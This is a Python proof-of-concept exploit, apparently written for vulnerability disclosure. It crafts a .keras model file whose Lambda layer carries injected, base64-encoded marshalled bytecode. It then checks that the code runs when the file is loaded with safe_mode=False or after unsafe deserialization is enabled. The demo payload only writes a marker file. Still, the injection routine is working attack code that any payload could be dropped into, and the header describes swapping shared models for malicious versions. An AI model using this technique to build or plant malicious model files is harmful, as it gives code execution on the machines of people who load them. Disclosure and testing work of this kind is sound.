"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC

VULNERABILITY:
    .keras model files are ZIP archives containing config.json. Lambda layers
    store base64-encoded, marshalled Python bytecode in config.json under the
    "function" -> "config" -> "code" key. When a model is loaded with
    safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
    this bytecode is unmarshalled and executed - enabling arbitrary code execution
    from a crafted model file.

IMPACT:
    Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
    code execution. Many official tutorials and StackOverflow answers recommend
    safe_mode=False to load models with custom layers. Hugging Face hosts thousands
    of .keras files that could be replaced with malicious versions.

ATTACK VECTOR:
    1. Attacker creates a legitimate-looking .keras model
    2. Attacker replaces Lambda layer bytecode with malicious payload
    3. Victim downloads model from Hugging Face, Kaggle, or email
    4. Victim loads with safe_mode=False -> code executes silently

AFFECTED:
    - keras >= 3.0 (all versions using .keras format)
    - tensorflow >= 2.16 (ships keras 3.x)

TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12

Usage:
    python3 poc_keras_lambda_ace.py
"""
|
import base64
import contextlib
import json
import marshal
import os
import shutil
import sys
import tempfile
import types
import zipfile
|
# Lower TensorFlow's native log verbosity. This is set at module import time,
# before any function in this file imports tensorflow (they all import it
# lazily inside their bodies).
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"

# The demo payload only writes PAYLOAD_MSG into MARKER_FILE; the presence of
# that file is how the tests below detect that the embedded code was executed.
MARKER_FILE = "/tmp/keras_ace_marker.txt"
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"
|
def _inject_into_lambda(node, code_b64):
    """Overwrite the serialized code of the first Lambda entry under *node*.

    Walks nested dicts and lists depth-first. A dict counts as a Lambda entry
    when its "class_name" is "Lambda" and its "config" -> "function" value is
    a dict that itself has a "config" key; that inner dict's "code" value is
    replaced with *code_b64*.

    Returns True as soon as one entry has been patched, False if none exists.
    """
    if isinstance(node, dict):
        if node.get("class_name") == "Lambda" and "config" in node:
            func = node["config"].get("function", {})
            if isinstance(func, dict) and "config" in func:
                func["config"]["code"] = code_b64
                print(" Injected payload into Lambda layer config")
                return True
        children = node.values()
    elif isinstance(node, list):
        children = node
    else:
        return False
    # any() short-circuits, so the walk stops at the first patched entry.
    return any(
        isinstance(child, (dict, list)) and _inject_into_lambda(child, code_b64)
        for child in children
    )


def create_malicious_keras_model(output_path):
    """Write a .keras archive whose Lambda layer carries the marker payload.

    Steps:
      1. Build and save a small Sequential model that contains a Lambda layer.
      2. Read every member of the saved ZIP archive and replace the Lambda
         layer's "code" entry in config.json with a base64-encoded, marshalled
         lambda that writes PAYLOAD_MSG to MARKER_FILE and returns its input.
      3. Write all members, with the patched config.json, to *output_path*.

    Args:
        output_path: Destination path of the patched .keras archive.

    Raises:
        SystemExit: with status 1 when config.json contains no Lambda entry.
    """
    import tensorflow as tf

    print("[*] Step 1: Building legitimate model with Lambda layer...")
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(5,)),
        tf.keras.layers.Dense(10, name="dense_1"),
        tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
        tf.keras.layers.Dense(1, name="output"),
    ])
    model.compile(optimizer="adam", loss="mse")

    # TemporaryDirectory removes the scratch directory on every exit path,
    # including exceptions raised while saving or reading the archive.
    with tempfile.TemporaryDirectory(prefix="keras_poc_") as tmp_dir:
        legit_path = os.path.join(tmp_dir, "legit.keras")
        model.save(legit_path)
        print(" Saved legitimate model: {} ({} bytes)".format(
            legit_path, os.path.getsize(legit_path)))

        print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
        with zipfile.ZipFile(legit_path, "r") as zf:
            archive_files = {name: zf.read(name) for name in zf.namelist()}

    config = json.loads(archive_files["config.json"])

    # The payload is deliberately harmless: it writes a marker file and then
    # passes the layer input through unchanged.
    evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
        MARKER_FILE, PAYLOAD_MSG
    )
    print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))

    # Compiling the source as an expression yields an outer code object; the
    # lambda's own code object is stored among its constants.
    evil_expr = compile(evil_source, "<payload>", "eval")
    lambda_code = next(
        const for const in evil_expr.co_consts if isinstance(const, types.CodeType)
    )

    evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
    print(" Encoded bytecode: {} chars".format(len(evil_b64)))

    if not _inject_into_lambda(config, evil_b64):
        print(" ERROR: Could not find Lambda layer in config.json")
        sys.exit(1)

    print("[*] Step 3: Repacking .keras file with malicious config...")
    archive_files["config.json"] = json.dumps(config).encode()
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in archive_files.items():
            zf.writestr(name, data)

    print(" Malicious model: {} ({} bytes)".format(
        output_path, os.path.getsize(output_path)))
|
def test_safe_mode_true(model_path):
    """Load *model_path* with the library's default settings and report ACE.

    Any existing marker file is removed first. load_model() is called without
    a safe_mode argument; an exception from it is printed as the expected
    "blocked" outcome.

    Args:
        model_path: Path of the .keras archive to load.

    Returns:
        True if MARKER_FILE exists after the load attempt, whether or not the
        load raised; False otherwise.
    """
    import tensorflow as tf

    print("\n[*] Test A: Loading with safe_mode=True (default)...")
    with contextlib.suppress(FileNotFoundError):
        os.remove(MARKER_FILE)

    try:
        tf.keras.models.load_model(model_path)
    except Exception as e:
        print(" Blocked as expected: {}".format(str(e)[:150]))
    else:
        print(" Model loaded (unexpected)")

    # Check the marker on both paths: a load that raised may still have run
    # the payload before failing, and that must not be reported as blocked.
    return os.path.exists(MARKER_FILE)
|
def test_safe_mode_false(model_path):
    """Load *model_path* with safe_mode=False and report whether the payload ran.

    Any existing marker file is removed first. The marker is checked right
    after loading and, if absent, again after one predict() call on random
    input of shape (1, 5).

    Args:
        model_path: Path of the .keras archive to load.

    Returns:
        True if MARKER_FILE was written during load or inference. If loading
        or inference raises, the error is printed and the result is whether
        MARKER_FILE exists at that point.
    """
    import tensorflow as tf
    import numpy as np

    def marker_written(stage):
        # Print the marker contents and return True when the payload has run.
        if not os.path.exists(MARKER_FILE):
            return False
        with open(MARKER_FILE) as f:
            content = f.read().strip()
        print(" >>> ACE CONFIRMED ON {}: marker = '{}'".format(stage, content))
        return True

    print("\n[*] Test B: Loading with safe_mode=False...")
    with contextlib.suppress(FileNotFoundError):
        os.remove(MARKER_FILE)

    try:
        loaded = tf.keras.models.load_model(model_path, safe_mode=False)
        print(" Model loaded with safe_mode=False")
        if marker_written("LOAD"):
            return True

        print(" No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)
        print(" Inference result: {}".format(result))
        if marker_written("INFERENCE"):
            return True

        print(" No ACE triggered")
        return False
    except Exception as e:
        print(" Error: {}".format(str(e)[:300]))
        # The payload may have run before the failure; do not report a false
        # negative in that case.
        return os.path.exists(MARKER_FILE)
|
def test_enable_unsafe_deserialization(model_path):
    """Load *model_path* after enable_unsafe_deserialization() and report ACE.

    Any existing marker file is removed first. The marker is checked right
    after loading and, if absent, again after one predict() call on random
    input of shape (1, 5).

    NOTE: nothing in this function switches the unsafe-deserialization setting
    back off after the test.

    Args:
        model_path: Path of the .keras archive to load.

    Returns:
        True if MARKER_FILE was written during load or inference. If loading
        or inference raises, the error is printed and the result is whether
        MARKER_FILE exists at that point.
    """
    import tensorflow as tf
    import numpy as np

    def marker_written(stage):
        # Print the marker contents and return True when the payload has run.
        if not os.path.exists(MARKER_FILE):
            return False
        with open(MARKER_FILE) as f:
            content = f.read().strip()
        print(" >>> ACE CONFIRMED ON {}: marker = '{}'".format(stage, content))
        return True

    print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
    with contextlib.suppress(FileNotFoundError):
        os.remove(MARKER_FILE)

    try:
        tf.keras.config.enable_unsafe_deserialization()
        loaded = tf.keras.models.load_model(model_path)
        print(" Model loaded with enable_unsafe_deserialization")
        if marker_written("LOAD"):
            return True

        print(" No execution on load. Running inference...")
        # Only the side effect matters here; the prediction itself is unused.
        loaded.predict(np.random.randn(1, 5), verbose=0)
        if marker_written("INFERENCE"):
            return True

        print(" No ACE triggered")
        return False
    except Exception as e:
        print(" Error: {}".format(str(e)[:300]))
        # The payload may have run before the failure; do not report a false
        # negative in that case.
        return os.path.exists(MARKER_FILE)
|
def main():
    """Build the patched model, run the three load tests, and print a summary.

    The patched archive is written next to this script as
    "malicious_lambda.keras" and is left on disk afterwards.
    """
    banner = "=" * 70
    print(banner)
    print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
    print(banner)

    script_dir = os.path.dirname(os.path.abspath(__file__))
    malicious_model = os.path.join(script_dir, "malicious_lambda.keras")

    # Start from a clean state so a marker left by an earlier run cannot be
    # mistaken for a fresh execution.
    with contextlib.suppress(FileNotFoundError):
        os.remove(MARKER_FILE)

    create_malicious_keras_model(malicious_model)

    ace_safe = test_safe_mode_true(malicious_model)
    ace_unsafe = test_safe_mode_false(malicious_model)
    ace_global = test_enable_unsafe_deserialization(malicious_model)

    print("\n" + banner)
    print("RESULTS:")
    print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)"))
    print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE"))
    print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE"))
    print()

    if ace_unsafe or ace_global:
        print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
        print("code execution when loaded with safe_mode=False or after calling")
        print("enable_unsafe_deserialization().")
        print()
        print("Marker file: {}".format(MARKER_FILE))
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                print("Contents: {}".format(f.read().strip()))
        print("\nMalicious model saved to: {}".format(malicious_model))
    else:
        print("No ACE triggered. Check TensorFlow/Keras version.")

    print(banner)
|
# Run the demonstration only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
|